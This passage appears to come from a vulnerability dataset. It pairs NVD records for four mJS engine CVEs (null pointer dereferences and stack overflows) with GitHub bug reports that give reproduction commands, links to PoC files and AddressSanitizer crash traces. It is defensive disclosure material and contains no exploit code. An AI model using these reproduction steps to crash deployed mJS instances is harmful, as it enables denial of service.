json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #63 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #64 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #65 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #66 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #67 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #68 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #69 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #70 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #71 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #72 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #73 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #74 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #75 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #76 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #77 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #78 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #79 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #80 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #81 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #82 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #83 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #84 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #85 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #86 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #87 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #88 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #89 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #90 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #91 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #92 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #93 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #94 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #95 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #96 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #97 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #98 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #99 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #100 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #101 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #102 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #103 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #104 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #105 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #106 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #107 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #108 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #109 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #110 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #111 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #112 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #113 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #114 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #115 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #116 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #117 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #118 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #119 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #120 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #121 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #122 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #123 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #124 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #125 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #126 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #127 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #128 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #129 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #130 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #131 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #132 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #133 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #134 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #135 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #136 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #137 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #138 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #139 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #140 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #141 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #142 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #143 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #144 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #145 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #146 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #147 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #148 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #149 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #150 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #151 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #152 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #153 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #154 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #155 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #156 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #157 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #158 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #159 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #160 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #161 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #162 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #163 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #164 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #165 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #166 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #167 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #168 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #169 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #170 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #171 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #172 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #173 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #174 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #175 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #176 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #177 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #178 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #179 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #180 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #181 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #182 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #183 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #184 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #185 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #186 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #187 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #188 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #189 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #190 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #191 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #192 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #193 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #194 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #195 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #196 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #197 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #198 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #199 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #200 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #201 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #202 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #203 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #204 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #205 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #206 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #207 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #208 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #209 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #210 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #211 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #212 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #213 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #214 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #215 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #216 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #217 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #218 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #219 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #220 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #221 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #222 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #223 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #224 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #225 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #226 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #227 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #228 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #229 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #230 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #231 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #232 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #233 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #234 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #235 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #236 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #237 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #238 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #239 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #240 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #241 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #242 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #243 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #244 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #245 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #246 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #247 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #248 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #249 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 #250 0x40b4c4 in json_parse_value test/mjs-uaf/build_asan/mjs.c:6000 #251 0x40aa25 in json_parse_array test/mjs-uaf/build_asan/mjs.c:5958 SUMMARY: AddressSanitizer: stack-overflow ??:0 ?? ==29997==ABORTING ```
AddressSanitizer: stack-buffer-overflow in json_parse_array() mjs.c:5952
https://api.github.com/repos/cesanta/mjs/issues/158/comments
0
2021-05-19T08:36:33Z
2021-05-19T08:36:33Z
https://github.com/cesanta/mjs/issues/158
895,156,817
158
3,877
CVE-2021-33440
2022-07-26T13:15:08.717
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_commit() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/163" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/cesanta/mjs/issues/163
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-7954-mjs_bcode_commit-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==8485==ERROR: AddressSanitizer: SEGV on unknown address 0x00000001dce5 (pc 0x00000041dada bp 0x7ffcd7b8dcf0 sp 0x7ffcd7b8da28 T0) #0 0x41dad9 in mjs_bcode_commit test/mjs-uaf/build_asan/mjs.c:8051 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fb23d82f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:8051 mjs_bcode_commit ==8485==ABORTING ```
A NULL pointer dereference in the function mjs_bcode_commit() mjs.c:8051
https://api.github.com/repos/cesanta/mjs/issues/163/comments
0
2021-05-19T08:40:50Z
2021-05-19T08:40:50Z
https://github.com/cesanta/mjs/issues/163
895,161,871
163
3,879
CVE-2021-33441
2022-07-26T13:15:08.757
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in exec_expr() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/165" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/165" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/cesanta/mjs/issues/165
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9035-exec_expr-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9001==ERROR: AddressSanitizer: SEGV on unknown address 0x00000042a6c5 (pc 0x000000422d9c bp 0x7ffd55fb7a40 sp 0x7ffd55fb7910 T0) #0 0x422d9b in exec_expr test/mjs-uaf/build_asan/mjs.c:9144 #1 0x4259f6 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9683 #2 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #3 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #4 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #5 0x7f019dc4882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #6 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:9144 exec_expr ==9001==ABORTING ```
A NULL pointer dereference in the function exec_expr() mjs.c:9144
https://api.github.com/repos/cesanta/mjs/issues/165/comments
0
2021-05-19T08:42:37Z
2021-05-19T08:42:37Z
https://github.com/cesanta/mjs/issues/165
895,163,896
165
3,880
CVE-2021-33442
2022-07-26T13:15:08.803
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in json_printf() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/161" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/161" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/cesanta/mjs/issues/161
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-6368-json_printf-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==31649==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000040e9b8 bp 0x7fff1c80ad38 sp 0x7fff1c80abe8 T0) #0 0x40e9b7 in json_printf test/mjs-uaf/build_asan/mjs.c:6396 #1 0x444aee in mjs_jprintf test/mjs-uaf/build_asan/mjs.c:14741 #2 0x44511a in mjs_fprintf test/mjs-uaf/build_asan/mjs.c:14781 #3 0x41dd43 in mjs_print test/mjs-uaf/build_asan/mjs.c:8088 #4 0x7fff1c80af6f (<unknown module>) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/mjs-uaf/build_asan/mjs.c:6396 json_printf ==31649==ABORTING ```
A NULL pointer dereference in the function json_printf() mjs.c:6396
https://api.github.com/repos/cesanta/mjs/issues/161/comments
0
2021-05-19T08:39:12Z
2021-05-19T08:39:12Z
https://github.com/cesanta/mjs/issues/161
895,160,290
161
3,881
CVE-2021-33443
2022-07-26T13:15:08.847
An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in mjs_execute() in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/167" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/167" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:*:*:*:*:*:*:*:*", "matchCriteriaId": "13B1A3EF-A920-4FB4-BD11-F97092B362F7", "versionEndExcluding": "2.20.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/cesanta/mjs/issues/167
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5) Compile Command: ``` $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs ``` Run Command: ``` $ mjs -f $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-9522-mjs_execute-stack-overflow ASAN info: ```C ASAN:SIGSEGV ================================================================= ==9792==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc50dbbc70 (pc 0x000000425735 bp 0x7ffc50dafdf0 sp 0x7ffc50dbbc78 T0) #0 0x425734 in mjs_execute test/mjs-uaf/build_asan/mjs.c:9650 #1 0x4265f1 in mjs_exec_internal test/mjs-uaf/build_asan/mjs.c:9866 #2 0x426873 in mjs_exec_file test/mjs-uaf/build_asan/mjs.c:9889 #3 0x431348 in main test/mjs-uaf/build_asan/mjs.c:12228 #4 0x7fa093d7e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #5 0x401af8 in _start ( test/mjs-uaf/bin_asan/bin/mjs_bin+0x401af8) SUMMARY: AddressSanitizer: stack-overflow test/mjs-uaf/build_asan/mjs.c:9650 mjs_execute ==9792==ABORTING ```
